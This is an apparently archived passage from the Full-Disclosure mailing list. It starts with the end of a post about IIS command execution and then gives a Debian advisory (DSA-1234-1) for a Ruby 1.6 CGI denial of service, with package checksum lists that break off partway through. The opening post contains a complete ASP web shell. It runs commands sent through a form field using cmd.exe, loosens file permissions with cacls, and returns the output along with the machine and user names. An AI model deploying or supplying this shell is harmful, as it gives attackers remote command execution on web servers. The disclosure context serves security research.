file created by IWAM_Machine The accesschk tool from sysinternals, can easily identify a valid location. Our testings came up with c:\windows\pchealth\ERRORREP\QHEADLES\ IIS6.0 revokes access to both IUSR_Machine and IWAM_Machine, and therefore this technique will not work on that platform. ------------------------------------------------------------------------ ---- <% Dim oS,oSNet,oFSys, oF,szCMD, szTF On Error Resume Next Set oS = Server.CreateObject("WSCRIPT.SHELL") Set oSNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFSys = Server.CreateObject("Scripting.FileSystemObject") szCMD = Request.Form("C") If (szCMD <> "") Then szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName() ' Here we do the command Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF & """",0,True) response.write szTF ' Change perms Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G everyone:F",0,True) Set oF = oFSys.OpenTextFile(szTF,1,False,0) End If %>
" method="POST"> 
Machine: <%=oSNet.ComputerName%>

Username: <%=oSNet.UserName%>

<% 
If (IsObject(oF)) Then
  On Error Resume Next
  Response.Write Server.HTMLEncode(oF.ReadAll)
  oF.Close
  Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
End If 
%>

========================================================================
====
% 
========================================================================
====



From skx at debian.org  Wed Dec 13 12:12:07 2006
From: skx at debian.org (Steve Kemp)
Date: Wed, 13 Dec 2006 12:12:07 +0000
Subject: [Full-disclosure] [SECURITY] [DSA-1234-1] New ruby1.6 package fix
	denial of service
Message-ID: <20061213121206.GA1665@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1234-1                  security at debian.org
http://www.debian.org/security/                               Steve Kemp
December 13, 2006
- ------------------------------------------------------------------------

Package        : ruby1.6 (1.6.8-12sarge3)
Vulnerability  : Denial of service
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2006-5467
Debian Bug     : 398457


A denial of service vulnerability has been discovered in the CGI library
included with Ruby, the intepreted scripting langauge for quick and easy
object-orientated programming.

For the stable distribution (sarge), this problem has been fixed in version 
1.6.8-12sarge3.

We recommend that you upgrade your ruby1.6 package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian 3.1 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6_1.6.8-12sarge3.dsc
    Size/MD5 checksum:      995 afe54a8363d4d14b066f32b07b095dde
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6_1.6.8-12sarge3.diff.gz
    Size/MD5 checksum:    78860 73e5ba7c3a427ceb1bf4926cf9e440a9
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6_1.6.8.orig.tar.gz
    Size/MD5 checksum:  1022364 aa1e272added83a5206c565d62c9c8ed

Architecture independent packages:

  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6-elisp_1.6.8-12sarge3_all.deb
    Size/MD5 checksum:   152700 0086c6b5b4d81a689ec8ab938e495e33
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6-examples_1.6.8-12sarge3_all.deb
    Size/MD5 checksum:   160374 ad819f654e8b072a38ebbf2e6aa24fd5
  http://security.debian.org/pool/updates/main/r/ruby1.6/irb1.6_1.6.8-12sarge3_all.deb
    Size/MD5 checksum:   174876 7518ee339c9c8450d13097c25d1ab034

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/r/ruby1.6/libtk-ruby1.6_1.6.8-12sarge3_alpha.deb
    Size/MD5 checksum:   178640 225d0be161efb37087a2ce9de3b37566
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6_1.6.8-12sarge3_alpha.deb
    Size/MD5 checksum:   688428 154f8e9a83bd637ff39df9023fad0bbb
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsyslog-ruby1.6_1.6.8-12sarge3_alpha.deb
    Size/MD5 checksum:   145022 cba2af385573937052fe3f00664841d3
  http://security.debian.org/pool/updates/main/r/ruby1.6/libcurses-ruby1.6_1.6.8-12sarge3_alpha.deb
    Size/MD5 checksum:   146562 eabbf08274f6cce027ace854627157cb
  http://security.debian.org/pool/updates/main/r/ruby1.6/libgdbm-ruby1.6_1.6.8-12sarge3_alpha.deb
    Size/MD5 checksum:   146560 5e49af7b3cbb7a60cf6d8ab3c453c1f2
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsdbm-ruby1.6_1.6.8-12sarge3_alpha.deb
    Size/MD5 checksum:   149118 dfcee284ca8d7e913b264f12de7d260f
  http://security.debian.org/pool/updates/main/r/ruby1.6/libdbm-ruby1.6_1.6.8-12sarge3_alpha.deb
    Size/MD5 checksum:   145046 5dd5914d57db7623cc2e25e4c0a7287a
  http://security.debian.org/pool/updates/main/r/ruby1.6/libreadline-ruby1.6_1.6.8-12sarge3_alpha.deb
    Size/MD5 checksum:   144908 d088c80629003bd8a800b2b8da360b11
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6-dbg_1.6.8-12sarge3_alpha.deb
    Size/MD5 checksum:   726692 a1d9bcf1e1c34576113b7c65a57f0576
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6-dev_1.6.8-12sarge3_alpha.deb
    Size/MD5 checksum:   700268 f0097fe8617fa00e30bfe746eb13706b
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtcltk-ruby1.6_1.6.8-12sarge3_alpha.deb
    Size/MD5 checksum:   165542 13bf6ffc763f2ca0d9af8522e2638dfd
  http://security.debian.org/pool/updates/main/r/ruby1.6/libpty-ruby1.6_1.6.8-12sarge3_alpha.deb
    Size/MD5 checksum:   148628 940fbeb69ccec2ab3b4956511642dccc
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6_1.6.8-12sarge3_alpha.deb
    Size/MD5 checksum:   159290 b403a9bb1d6e5c3007b4d283620c0302

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/r/ruby1.6/libtcltk-ruby1.6_1.6.8-12sarge3_amd64.deb
    Size/MD5 checksum:   164818 aff47f4b190bf00d9b8e9903373c6333
  http://security.debian.org/pool/updates/main/r/ruby1.6/libpty-ruby1.6_1.6.8-12sarge3_amd64.deb
    Size/MD5 checksum:   148026 21e694282148b8631aee26ca6b2ad9b8
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6-dbg_1.6.8-12sarge3_amd64.deb
    Size/MD5 checksum:   688068 c4d59fd192b5f648604fc09f82c67d41
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6-dev_1.6.8-12sarge3_amd64.deb
    Size/MD5 checksum:   577402 f72367e44f4ae55c36ab7df959d75149
  http://security.debian.org/pool/updates/main/r/ruby1.6/libreadline-ruby1.6_1.6.8-12sarge3_amd64.deb
    Size/MD5 checksum:   144288 8134c6e83daed5a07884881a7f6e0a3b
  http://security.debian.org/pool/updates/main/r/ruby1.6/libcurses-ruby1.6_1.6.8-12sarge3_amd64.deb
    Size/MD5 checksum:   145502 c3cc5c8cccc7850c5038f3778924806a
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsdbm-ruby1.6_1.6.8-12sarge3_amd64.deb
    Size/MD5 checksum:   147764 4935294864a911066640c61944817061
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsyslog-ruby1.6_1.6.8-12sarge3_amd64.deb
    Size/MD5 checksum:   144554 60e6eff272013f9959844f91905efc1f
  http://security.debian.org/pool/updates/main/r/ruby1.6/libdbm-ruby1.6_1.6.8-12sarge3_amd64.deb
    Size/MD5 checksum:   144338 6813806140be66ca7f57e197d736913b
  http://security.debian.org/pool/updates/main/r/ruby1.6/libgdbm-ruby1.6_1.6.8-12sarge3_amd64.deb
    Size/MD5 checksum:   145894 9554144622d3b5893271d91c12a65fee
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6_1.6.8-12sarge3_amd64.deb
    Size/MD5 checksum:   642408 204f5254cb042361949dfe1677e74397
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6_1.6.8-12sarge3_amd64.deb
    Size/MD5 checksum:   158994 c6385b5f4c253db485ae69010f131fd0
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtk-ruby1.6_1.6.8-12sarge3_amd64.deb
    Size/MD5 checksum:   178398 71698e9480c2ea3f27644cf572f80430

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/r/ruby1.6/libcurses-ruby1.6_1.6.8-12sarge3_arm.deb
    Size/MD5 checksum:   144496 f0b1ca783f13a9ee7825e383cedc9821
  http://security.debian.org/pool/updates/main/r/ruby1.6/libpty-ruby1.6_1.6.8-12sarge3_arm.deb
    Size/MD5 checksum:   147320 d0aee332fadd1b2e351317b626022fc8
  http://security.debian.org/pool/updates/main/r/ruby1.6/libdbm-ruby1.6_1.6.8-12sarge3_arm.deb
    Size/MD5 checksum:   143468 c97704d53471ec29c8f3074df3990010
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtcltk-ruby1.6_1.6.8-12sarge3_arm.deb
    Size/MD5 checksum:   163978 65a2a9dedb0540c007abd1394e49258b
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6_1.6.8-12sarge3_arm.deb
    Size/MD5 checksum:   616564 253e50c1a16e23c03b7192a9138e75c2
  http://security.debian.org/pool/updates/main/r/ruby1.6/libgdbm-ruby1.6_1.6.8-12sarge3_arm.deb
    Size/MD5 checksum:   144406 7cda48fca70e467655d1b4af12c5a63a
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6-dev_1.6.8-12sarge3_arm.deb
    Size/MD5 checksum:   582246 6317ca5966e3895c9afb265da9024ee1
  http://security.debian.org/pool/updates/main/r/ruby1.6/libreadline-ruby1.6_1.6.8-12sarge3_arm.deb
    Size/MD5 checksum:   143506 dd2aa14c24af38c1817ff7c8d8d6c611
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6_1.6.8-12sarge3_arm.deb
    Size/MD5 checksum:   158758 831d69303a12966fd4167386f3bad624
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsyslog-ruby1.6_1.6.8-12sarge3_arm.deb
    Size/MD5 checksum:   144126 f59a00b2dd2d91162a8db1c0fa5df523
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsdbm-ruby1.6_1.6.8-12sarge3_arm.deb
    Size/MD5 checksum:   146570 057062a8864242676017884405241b43
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtk-ruby1.6_1.6.8-12sarge3_arm.deb
    Size/MD5 checksum:   178326 897ce0b2431e334485dc783c150bef48
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6-dbg_1.6.8-12sarge3_arm.deb
    Size/MD5 checksum:   658204 6185331e2d979f8020338a215d0e654b

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/r/ruby1.6/libsdbm-ruby1.6_1.6.8-12sarge3_hppa.deb
    Size/MD5 checksum:   148944 e836b7fb29e09c04fcbced13f9a357b6
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6_1.6.8-12sarge3_hppa.deb
    Size/MD5 checksum:   702938 39653ef7a0eed83b841f5861b4486346
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtk-ruby1.6_1.6.8-12sarge3_hppa.deb
    Size/MD5 checksum:   179102 8f0f418f64b53d5a40de46cd12e0879b
  http://security.debian.org/pool/updates/main/r/ruby1.6/libgdbm-ruby1.6_1.6.8-12sarge3_hppa.deb
    Size/MD5 checksum:   147038 55de9030c550d9fda11a09437b1a6881
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtcltk-ruby1.6_1.6.8-12sarge3_hppa.deb
    Size/MD5 checksum:   166364 cad06e65732544c6e18b7633030510a9
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsyslog-ruby1.6_1.6.8-12sarge3_hppa.deb
    Size/MD5 checksum:   145670 a892ee781d1e6077d9d4bd32cc819744
  http://security.debian.org/pool/updates/main/r/ruby1.6/libcurses-ruby1.6_1.6.8-12sarge3_hppa.deb
    Size/MD5 checksum:   146612 1097a76e4d3f662759f0c9c28f2dcbe0
  http://security.debian.org/pool/updates/main/r/ruby1.6/libdbm-ruby1.6_1.6.8-12sarge3_hppa.deb
    Size/MD5 checksum:   145534 5674d0646febc3c37e646fa3f397d6fc
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6-dev_1.6.8-12sarge3_hppa.deb
    Size/MD5 checksum:   650994 7e91a28af706ac571e2a8aed1b405419
  http://security.debian.org/pool/updates/main/r/ruby1.6/libpty-ruby1.6_1.6.8-12sarge3_hppa.deb
    Size/MD5 checksum:   148980 24bba2514cfdfd8f9d14df4d58a0b8a7
  http://security.debian.org/pool/updates/main/r/ruby1.6/libreadline-ruby1.6_1.6.8-12sarge3_hppa.deb
    Size/MD5 checksum:   145154 f820b3dfc10aced5bcd248a774865002
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6-dbg_1.6.8-12sarge3_hppa.deb
    Size/MD5 checksum:   741098 0a83d1c24e4cea428438c40a34db0856
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6_1.6.8-12sarge3_hppa.deb
    Size/MD5 checksum:   159362 fdcadb966ee0d979592fe87ada1741dc

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/r/ruby1.6/libcurses-ruby1.6_1.6.8-12sarge3_i386.deb
    Size/MD5 checksum:   144886 b612779ff9ac97a27a3416ef3c512eab
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsdbm-ruby1.6_1.6.8-12sarge3_i386.deb
    Size/MD5 checksum:   147276 9bba0744ac04aaf167072763f292afb0
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtk-ruby1.6_1.6.8-12sarge3_i386.deb
    Size/MD5 checksum:   178330 1b319065b7c5e9c04e00a63291489ff0
  http://security.debian.org/pool/updates/main/r/ruby1.6/libreadline-ruby1.6_1.6.8-12sarge3_i386.deb
    Size/MD5 checksum:   143682 a09ac9249c7fed2c3d523ee8fab31ec5
  http://security.debian.org/pool/updates/main/r/ruby1.6/libdbm-ruby1.6_1.6.8-12sarge3_i386.deb
    Size/MD5 checksum:   144072 61775e82c062c19c29879e13ec2766de
  http://security.debian.org/pool/updates/main/r/ruby1.6/libpty-ruby1.6_1.6.8-12sarge3_i386.deb
    Size/MD5 checksum:   147468 9af13c33b594bb6cdb536c9a2c067a63
  http://security.debian.org/pool/updates/main/r/ruby1.6/libgdbm-ruby1.6_1.6.8-12sarge3_i386.deb
    Size/MD5 checksum:   145130 f93afeb835f6d016e1bde4ca88274e95
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsyslog-ruby1.6_1.6.8-12sarge3_i386.deb
    Size/MD5 checksum:   144000 1f8fdf448c3a9247bcf9415e19ad8df3
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6-dev_1.6.8-12sarge3_i386.deb
    Size/MD5 checksum:   552196 efd62faf3397ceaafe2d32f71c874357
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6_1.6.8-12sarge3_i386.deb
    Size/MD5 checksum:   616648 55ff1ea87e6ff23f4e86af660666e14f
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtcltk-ruby1.6_1.6.8-12sarge3_i386.deb
    Size/MD5 checksum:   164250 6243594d2dab47a2933e6d5261a216fa
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6-dbg_1.6.8-12sarge3_i386.deb
    Size/MD5 checksum:   669656 48bb2a4f4763a33c694df458626b02cf
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6_1.6.8-12sarge3_i386.deb
    Size/MD5 checksum:   158780 602b6b2dab6c525b4c3d7ce1f5d8254e

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/r/ruby1.6/libsyslog-ruby1.6_1.6.8-12sarge3_ia64.deb
    Size/MD5 checksum:   146544 528caff2be9a987e112b80ec7901c0d2
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtcltk-ruby1.6_1.6.8-12sarge3_ia64.deb
    Size/MD5 checksum:   167730 da38c813df07af30097aa5f07f0f39fd
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6-dbg_1.6.8-12sarge3_ia64.deb
    Size/MD5 checksum:   874930 8eaf1e00f39f10539602f98e3ed1ee50
  http://security.debian.org/pool/updates/main/r/ruby1.6/libpty-ruby1.6_1.6.8-12sarge3_ia64.deb
    Size/MD5 checksum:   150698 64d3c7e76ea21a04de6ff033a41858e3
  http://security.debian.org/pool/updates/main/r/ruby1.6/libdbm-ruby1.6_1.6.8-12sarge3_ia64.deb
    Size/MD5 checksum:   147228 c892c2a7313b08e05e54f8c6ae1529ea
  http://security.debian.org/pool/updates/main/r/ruby1.6/libgdbm-ruby1.6_1.6.8-12sarge3_ia64.deb
    Size/MD5 checksum:   149250 4dc8acc8ede7f48e40c2f7a88c8a7454
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtk-ruby1.6_1.6.8-12sarge3_ia64.deb
    Size/MD5 checksum:   179356 80509dd535e855690e24475e806d3fc3
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6-dev_1.6.8-12sarge3_ia64.deb
    Size/MD5 checksum:   762730 adbcd0a670fb1e196f355e8a60ef6ef6
  http://security.debian.org/pool/updates/main/r/ruby1.6/libcurses-ruby1.6_1.6.8-12sarge3_ia64.deb
    Size/MD5 checksum:   148356 945bbf9ae0d8215ad1745aa2bfe23706
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsdbm-ruby1.6_1.6.8-12sarge3_ia64.deb
    Size/MD5 checksum:   154270 466654f80151e6f7b5336975afc7ce35
  http://security.debian.org/pool/updates/main/r/ruby1.6/libreadline-ruby1.6_1.6.8-12sarge3_ia64.deb
    Size/MD5 checksum:   147086 82ab42243ba5b78f41c1f647bbc8a484
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6_1.6.8-12sarge3_ia64.deb
    Size/MD5 checksum:   820748 df9a6606ef6c0328378ab80d92e80247
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6_1.6.8-12sarge3_ia64.deb
    Size/MD5 checksum:   159710 e76c74583b6175d467f678fadec83d53

m68k architecture (Motorola Mc680x0)

  http://security.debian.org/pool/updates/main/r/ruby1.6/libgdbm-ruby1.6_1.6.8-12sarge3_m68k.deb
    Size/MD5 checksum:   144712 c2a1e7714f8543cccabb26a1d6d69a04
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsyslog-ruby1.6_1.6.8-12sarge3_m68k.deb
    Size/MD5 checksum:   144546 ae7b14ce1b0f3dbbdace3dd4748d75c8
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6_1.6.8-12sarge3_m68k.deb
    Size/MD5 checksum:   603230 4ca88f79d61d95fb0f03052fe19b7593
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtcltk-ruby1.6_1.6.8-12sarge3_m68k.deb
    Size/MD5 checksum:   164178 5f23186d2355ef883d3b31dd26626f5a
  http://security.debian.org/pool/updates/main/r/ruby1.6/libpty-ruby1.6_1.6.8-12sarge3_m68k.deb
    Size/MD5 checksum:   147638 1fb27ef4a6696059a342f2eb9b2dcf4f
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6-dev_1.6.8-12sarge3_m68k.deb
    Size/MD5 checksum:   493806 76f8de2c1903648d05f42d66eb6e4bf7
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtk-ruby1.6_1.6.8-12sarge3_m68k.deb
    Size/MD5 checksum:   178312 b1e8e64639f421e946647292acca7095
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6-dbg_1.6.8-12sarge3_m68k.deb
    Size/MD5 checksum:   648340 61747528ef0325a1c63d4e58a33f0160
  http://security.debian.org/pool/updates/main/r/ruby1.6/libdbm-ruby1.6_1.6.8-12sarge3_m68k.deb
    Size/MD5 checksum:   143514 5bf961f7b04ad1c64d98a5181a578a0c
  http://security.debian.org/pool/updates/main/r/ruby1.6/libcurses-ruby1.6_1.6.8-12sarge3_m68k.deb
    Size/MD5 checksum:   144834 7d377a98ee5c18482a0f8f7188001399
  http://security.debian.org/pool/updates/main/r/ruby1.6/libreadline-ruby1.6_1.6.8-12sarge3_m68k.deb
    Size/MD5 checksum:   143760 deae6eb5f2cb2339cd887d4a4b182721
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6_1.6.8-12sarge3_m68k.deb
    Size/MD5 checksum:   158708 33788677e02d342ae3c4d3a1b3140e1a
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsdbm-ruby1.6_1.6.8-12sarge3_m68k.deb
    Size/MD5 checksum:   145964 c1e8c28f26f3c65fd1c4036e6b9c3525

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6_1.6.8-12sarge3_mips.deb
    Size/MD5 checksum:   627008 55d06bac9ec2e052a641590942dbc01c
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtk-ruby1.6_1.6.8-12sarge3_mips.deb
    Size/MD5 checksum:   178404 cff58d0cd08592f023a9a3a46b8850c3
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtcltk-ruby1.6_1.6.8-12sarge3_mips.deb
    Size/MD5 checksum:   163634 e52709367bf26bf5a754c66fa75f41bd
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6-dev_1.6.8-12sarge3_mips.deb
    Size/MD5 checksum:   604580 8b86731b20ad26952795fb7f577af6e9
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsyslog-ruby1.6_1.6.8-12sarge3_mips.deb
    Size/MD5 checksum:   143972 edb950ad26a49f71ebbb3047b58609b5
  http://security.debian.org/pool/updates/main/r/ruby1.6/libgdbm-ruby1.6_1.6.8-12sarge3_mips.deb
    Size/MD5 checksum:   144626 54f10f654113dd6535a08af04df3644e
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6-dbg_1.6.8-12sarge3_mips.deb
    Size/MD5 checksum:   676274 b865d0a95e7f3c2bfc2b6283023d364b
  http://security.debian.org/pool/updates/main/r/ruby1.6/libpty-ruby1.6_1.6.8-12sarge3_mips.deb
    Size/MD5 checksum:   147788 6716ba9b9ca8ce84d9af6647db281af8
  http://security.debian.org/pool/updates/main/r/ruby1.6/libdbm-ruby1.6_1.6.8-12sarge3_mips.deb
    Size/MD5 checksum:   143444 bbabd4f42b9f5cc4aa743cb698346b00
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6_1.6.8-12sarge3_mips.deb
    Size/MD5 checksum:   159526 36359e57131dd8111f915c776460149b
  http://security.debian.org/pool/updates/main/r/ruby1.6/libreadline-ruby1.6_1.6.8-12sarge3_mips.deb
    Size/MD5 checksum:   143678 3d6364965eaa22f46407b3a7096a7303
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsdbm-ruby1.6_1.6.8-12sarge3_mips.deb
    Size/MD5 checksum:   146986 40f6fd607016cda785db80314ab44c35
  http://security.debian.org/pool/updates/main/r/ruby1.6/libcurses-ruby1.6_1.6.8-12sarge3_mips.deb
    Size/MD5 checksum:   144534 d4fcbebac17e3878f029551bc61c3b63

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/r/ruby1.6/libtk-ruby1.6_1.6.8-12sarge3_mipsel.deb
    Size/MD5 checksum:   178392 3bf8e03d54230967565dd52f4fea2dc5
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6-dbg_1.6.8-12sarge3_mipsel.deb
    Size/MD5 checksum:   670178 2672a61e8f68e7dfb9ffe7f4675b7cb5
  http://security.debian.org/pool/updates/main/r/ruby1.6/libgdbm-ruby1.6_1.6.8-12sarge3_mipsel.deb
    Size/MD5 checksum:   144626 5cab76b8e2c9e2103d1dd699dddcae18
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtcltk-ruby1.6_1.6.8-12sarge3_mipsel.deb
    Size/MD5 checksum:   163580 728f4b15d19c60674c97ad968f60f57e
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsyslog-ruby1.6_1.6.8-12sarge3_mipsel.deb
    Size/MD5 checksum:   143960 b06ebde77d38fda38ded6cdc85508446
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6_1.6.8-12sarge3_mipsel.deb
    Size/MD5 checksum:   159510 34b3a4b70d81b1ad2b1c51c4b4719150
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsdbm-ruby1.6_1.6.8-12sarge3_mipsel.deb
    Size/MD5 checksum:   147012 30ffe2fc9f2f441e52edadb7c870da10
  http://security.debian.org/pool/updates/main/r/ruby1.6/libdbm-ruby1.6_1.6.8-12sarge3_mipsel.deb
    Size/MD5 checksum:   143430 ad06db9e159a552da7e1e6f89d7ca081
  http://security.debian.org/pool/updates/main/r/ruby1.6/libpty-ruby1.6_1.6.8-12sarge3_mipsel.deb
    Size/MD5 checksum:   147732 258921162310f68b575559817866e4e6
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6-dev_1.6.8-12sarge3_mipsel.deb
    Size/MD5 checksum:   597896 b27575ab5272948e41d04e99c8743d1f
  http://security.debian.org/pool/updates/main/r/ruby1.6/libreadline-ruby1.6_1.6.8-12sarge3_mipsel.deb
    Size/MD5 checksum:   143624 068d996407dfbffd5ae763f785bb5533
  http://security.debian.org/pool/updates/main/r/ruby1.6/libcurses-ruby1.6_1.6.8-12sarge3_mipsel.deb
    Size/MD5 checksum:   144508 37fa4958cba56f6fb8efc26d79f813c5
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6_1.6.8-12sarge3_mipsel.deb
    Size/MD5 checksum:   627276 b9ed0467e0a2a3bcf2f08976a3e08dc8

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6_1.6.8-12sarge3_powerpc.deb
    Size/MD5 checksum:   160680 0812f75398011b695c3f665e1d595255
  http://security.debian.org/pool/updates/main/r/ruby1.6/libreadline-ruby1.6_1.6.8-12sarge3_powerpc.deb
    Size/MD5 checksum:   145552 515be2c3ef243559c9f899661e7f9877
  http://security.debian.org/pool/updates/main/r/ruby1.6/libpty-ruby1.6_1.6.8-12sarge3_powerpc.deb
    Size/MD5 checksum:   149568 55de6597739cd55e3b9c95592e862ede
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6-dbg_1.6.8-12sarge3_powerpc.deb
    Size/MD5 checksum:   858346 094504fe267353c886c4dd39033ab5f5
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsyslog-ruby1.6_1.6.8-12sarge3_powerpc.deb
    Size/MD5 checksum:   146140 594c544e537b4665e8c5d67715cf21ca
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6_1.6.8-12sarge3_powerpc.deb
    Size/MD5 checksum:   651384 b6a9bd13bbb16f94e5fad210673ce632
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtcltk-ruby1.6_1.6.8-12sarge3_powerpc.deb
    Size/MD5 checksum:   165740 d35928983927d21ac99ab94f7a6d0729
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsdbm-ruby1.6_1.6.8-12sarge3_powerpc.deb
    Size/MD5 checksum:   148922 5aafb2f4a5f31f644505ecc56ee802b8
  http://security.debian.org/pool/updates/main/r/ruby1.6/libtk-ruby1.6_1.6.8-12sarge3_powerpc.deb
    Size/MD5 checksum:   180330 f019e480a851a18c363e089e826600cd
  http://security.debian.org/pool/updates/main/r/ruby1.6/libgdbm-ruby1.6_1.6.8-12sarge3_powerpc.deb
    Size/MD5 checksum:   146918 7dad85b5d0f3be26e1f957dce9749849
  http://security.debian.org/pool/updates/main/r/ruby1.6/ruby1.6-dev_1.6.8-12sarge3_powerpc.deb
    Size/MD5 checksum:   555054 b49e866b4620847957e2e0a2dfa8ec7b
  http://security.debian.org/pool/updates/main/r/ruby1.6/libcurses-ruby1.6_1.6.8-12sarge3_powerpc.deb
    Size/MD5 checksum:   146374 2390408d9f6fa502a17a4a2940e6cb10
  http://security.debian.org/pool/updates/main/r/ruby1.6/libdbm-ruby1.6_1.6.8-12sarge3_powerpc.deb
    Size/MD5 checksum:   145894 8db11656628d5aeaacc4a8d6aae6bade

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/r/ruby1.6/libtk-ruby1.6_1.6.8-12sarge3_s390.deb
    Size/MD5 checksum:   178592 5dfbc53bf43a1d3b7fe156fb77aef9b1
  http://security.debian.org/pool/updates/main/r/ruby1.6/libgdbm-ruby1.6_1.6.8-12sarge3_s390.deb
    Size/MD5 checksum:   146178 aaa66a6e73a2cd0a1febec7c401661a3
  http://security.debian.org/pool/updates/main/r/ruby1.6/libreadline-ruby1.6_1.6.8-12sarge3_s390.deb
    Size/MD5 checksum:   144738 a601fc1b9e7a6a11326acb8a94d7e792
  http://security.debian.org/pool/updates/main/r/ruby1.6/libruby1.6_1.6.8-12sarge3_s390.deb
    Size/MD5 checksum:   666320 76c056a8bc868d24ba13de0a6358ab91
  http://security.debian.org/pool/updates/main/r/ruby1.6/libsyslog-ruby1.6_1.6.8-12sarge3_s390.deb
    Size/MD5 checksum:   144748 6c2428bef96bac143c329987037a9678
  http://security.debian.org/pool/updates/main/r/ruby1.6/libdbm-ruby1.6_1.6.8-12sarge3_s390.deb
    Size/MD5 checksum:   144766 89d97dfcb4e3646cf38d7f024bafa3dd
